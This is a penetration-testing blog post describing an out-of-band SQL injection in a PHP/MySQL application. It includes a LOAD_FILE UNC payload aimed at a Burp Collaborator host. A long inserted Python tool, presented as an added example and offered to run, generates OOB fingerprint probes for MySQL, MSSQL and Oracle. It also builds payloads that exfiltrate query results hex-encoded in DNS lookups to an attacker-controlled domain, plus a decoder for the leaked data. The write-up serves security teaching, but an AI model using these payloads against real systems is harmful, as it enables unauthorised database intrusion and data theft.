My Pentest Log -12- (Out-of-Band SQL Injection in MySQL)
Greetings to everyone from Byzantion,
Today I would like to tell you about an out-of-band SQL injection I came across in an application I was performing web security tests on.
1. Our project management assigned me to perform security tests on the “private.com” application.
2. First, as always, I examined the scope document and completed the necessary verifications, then started the pentest phases.
3. The target was a PHP-based web application. Did this give us an advantage?
PHP applications are often deployed with insufficient hardening; when an application is developed carelessly in PHP it is easy to miss problems both in the code itself and in the way the application behaves at runtime, and these turn into a variety of vulnerabilities. A tester who knows PHP well can therefore pick up small and large problems at many different points and turn them into findings.
4. Returning to our topic: once the tests had reached a certain stage I had found several vulnerabilities, but the most motivating one was the “Out-of-band SQL Injection” finding.
To explain out-of-band attacks briefly:
From a security point of view, it is an attack vector in which the vulnerable application (or the database server behind it) is made to initiate network requests on our behalf, most often DNS lookups, but also HTTP or SMB connections, towards a host we control. Sometimes data is leaked inside those requests (for example, encoded into the hostname being looked up); sometimes the request simply proves that our input reached the back end and makes further reconnaissance possible, even when the application's own response shows nothing at all.
However, this attack vector is harder to pull off today than in the past: security products (a WAF, for example) can block the injected request or detect the attempt and respond in ways that slow us down or send us in the wrong direction, and egress filtering on the database server can stop the outbound connection from ever leaving the network.
5. Anyway, I noticed that when I put a single quote (') in the “id” parameter of the “news.php” file on the target application, the application returned false, and when I entered two single quotes ('') it returned true. From this I realised that the code handling this request does not validate its input adequately and that SQL crafted by us can be injected into the query.
6. However, this alone is not enough to verify the vulnerability. In such cases I usually try the “time based” technique to confirm the vulnerability through delays, but that was not possible on “private.com”. At this point I started thinking about what else I could do and decided to try the “out-of-band” technique. For “out-of-band” to be possible, the database server behind the application must be able to make outbound network requests (DNS, SMB, HTTP). The best way to find out is to identify the database software in use and then look up which functions and syntax that particular software offers for making requests to external systems.
7. I was lucky here, because our client had stated that the application uses MySQL. If they had not, how could it have been determined at this stage?
By researching which functions, syntax and request types each database product can use to reach external systems, and then trying them one by one: the probe that produces an outbound request (or a telling response) identifies the product. For instance:
For MySQL, “LOAD_FILE” with a UNC path (which only triggers a name lookup when the MySQL server runs on Windows and the account holds the FILE privilege); for MSSQL, the “xp_dirtree” stored procedure. Giving each probe its own subdomain makes the hostname that arrives tell you which engine executed it.
8. Back to our case: since I knew the target application used MySQL,
I noticed that after I built the expression
“(select load_file('\\\\xqrmh34jtln6o5rlozynskiohfn5bu.burpcollaborator.net\\hcibo'))”
added it to the relevant parameter and sent the request, several lookups arrived on the Collaborator.
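The probes from step 7 and the LOAD_FILE payload from step 8, generalised into a small helper, as an added example; this is my code, not the author's and not part of Burp. It assumes a placeholder DNS-logging domain oob.example.net in place of the Collaborator host, an injection point that accepts a SQL expression like the “id” parameter above, and a DNS log that hands back the full hostname that was looked up; the SECRET value and the SAMPLE_HITS derived from it are constructed test data, not a real capture. The MySQL payload works because backslash is an escape character inside a MySQL string literal, so '\\\\' becomes the \\ that starts a UNC path, and a Windows-hosted MySQL resolves the host name before it can fail to open the file (on Linux the same path is just a non-existent file and no lookup happens). Each fingerprint probe carries its own subdomain tag so the hostname that arrives names the engine, and the exfiltration variant goes beyond the post's single probe: it packs HEX(SUBSTRING(...)) into 31-byte pieces so each fits one 63-octet DNS label, and the decoder reassembles them from the log.

```python
"""Out-of-band SQL injection helpers: DBMS fingerprint probes, MySQL DNS
exfiltration payloads, and a decoder for the hostnames that arrive.

Added example, not code from the original post. Every name below is an
assumption: COLLAB stands in for a Burp Collaborator domain; SECRET and
SAMPLE_HITS are constructed test data, not a real capture.
"""
import binascii
import re

COLLAB = "oob.example.net"   # placeholder for the attacker-controlled DNS-logging domain
MAX_LABEL = 63               # RFC 1035: a single DNS label is at most 63 octets
CHUNK = MAX_LABEL // 2       # HEX() doubles the length, so 31 raw bytes fill one label


def fingerprint_payloads(domain: str = COLLAB) -> dict:
    """One OOB probe per engine, each tagged with its own subdomain.

    Send them all into the injection point; whichever tag shows up in the DNS
    log names the engine. Caveats: MySQL's LOAD_FILE on a UNC path only causes
    a lookup when the server runs on Windows (and needs the FILE privilege);
    xp_dirtree needs stacked queries; UTL_INADDR needs execute rights on the package.
    """
    return {
        # MySQL escapes backslashes in string literals: '\\\\' -> \\ (UNC prefix), '\\x' -> \x
        "mysql": f"(SELECT LOAD_FILE('\\\\\\\\mysql.{domain}\\\\x'))",
        # T-SQL does not escape backslashes, so two are enough; runs as a stacked statement
        "mssql": f";EXEC master..xp_dirtree '\\\\mssql.{domain}\\x'--",
        "oracle": f"(SELECT UTL_INADDR.GET_HOST_ADDRESS('oracle.{domain}') FROM dual)",
    }


def exfil_payloads(expr: str, total_len: int, domain: str = COLLAB, tag: str = "mysql") -> list:
    """MySQL payloads that leak the value of `expr` 31 bytes per DNS lookup.

    Each lookup is <seq>.<hex chunk>.<tag>.<domain>. The four-digit sequence
    number lets the receiver reorder hits that arrive out of order. In practice
    `total_len` is learned first from a single probe such as
    exfil_payloads("LENGTH(user())", 10)[0].
    """
    payloads = []
    for seq, pos in enumerate(range(1, total_len + 1, CHUNK)):   # SUBSTRING is 1-based
        host = (f"CONCAT('\\\\\\\\{seq:04d}.', HEX(SUBSTRING(({expr}), {pos}, {CHUNK})), "
                f"'.{tag}.{domain}\\\\x')")
        payloads.append(f"(SELECT LOAD_FILE({host}))")
    return payloads


HIT_RE = re.compile(r"^(\d{4})\.([0-9a-f]+)\.")


def decode_hits(hostnames, sent: int, domain: str = COLLAB, tag: str = "mysql"):
    """Reassemble the leaked bytes from logged DNS names.

    Tolerates duplicates (resolver retries), arbitrary order, mixed case and a
    trailing dot, and ignores names from other probes. Returns (data, missing
    sequence numbers) so the caller knows which payloads to resend.
    """
    chunks = {}
    for name in hostnames:
        name = name.lower().rstrip(".")
        if not name.endswith(f".{tag}.{domain}"):
            continue                                   # another probe, or noise
        m = HIT_RE.match(name)
        if m:
            chunks[int(m.group(1))] = binascii.unhexlify(m.group(2))
    data = b"".join(chunks[i] for i in sorted(chunks))
    missing = sorted(set(range(sent)) - set(chunks))
    return data, missing


# --- constructed test data: what the DNS log would show after the payloads fire ---
SECRET = b"webapp@WIN-DB01:8.0.36-community-log"   # pretend result of user()/@@version


def _fake_hits(secret: bytes) -> list:
    hits = [f"{seq:04d}.{binascii.hexlify(secret[pos:pos + CHUNK]).decode().upper()}.mysql.{COLLAB}"
            for seq, pos in enumerate(range(0, len(secret), CHUNK))]
    hits.reverse()                   # arrives out of order
    hits.append(hits[0] + ".")       # resolver retry logged twice, with a trailing dot
    hits.append(f"ns1.{COLLAB}")     # unrelated lookup against the same domain
    return hits


SAMPLE_HITS = _fake_hits(SECRET)


def demo():
    payloads = exfil_payloads("user()", len(SECRET))   # total_len normally comes from a LENGTH() probe
    return decode_hits(SAMPLE_HITS, sent=len(payloads))


if __name__ == "__main__":
    for name, payload in fingerprint_payloads().items():
        print(f"{name:7} {payload}")
    data, missing = demo()
    print(data.decode(), "missing:", missing)
```

Run it as a script to print the three fingerprint probes and the reassembled value. Resolver retries and out-of-order arrival are the normal case with DNS-based exfiltration, which is why every piece carries a sequence number and the decoder reports gaps instead of silently producing a shorter string.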
9. This verified, with the out-of-band technique, the SQL injection I had detected in the application; I added the vulnerability to my report and continued my tests with high motivation at the end of the day.
In summary:
Keeping in mind that many of the vulnerabilities we encounter can be checked with out-of-band techniques, which let us confirm their existence more easily and carry the exploitation through, adds a sharper security perspective at the end of the day.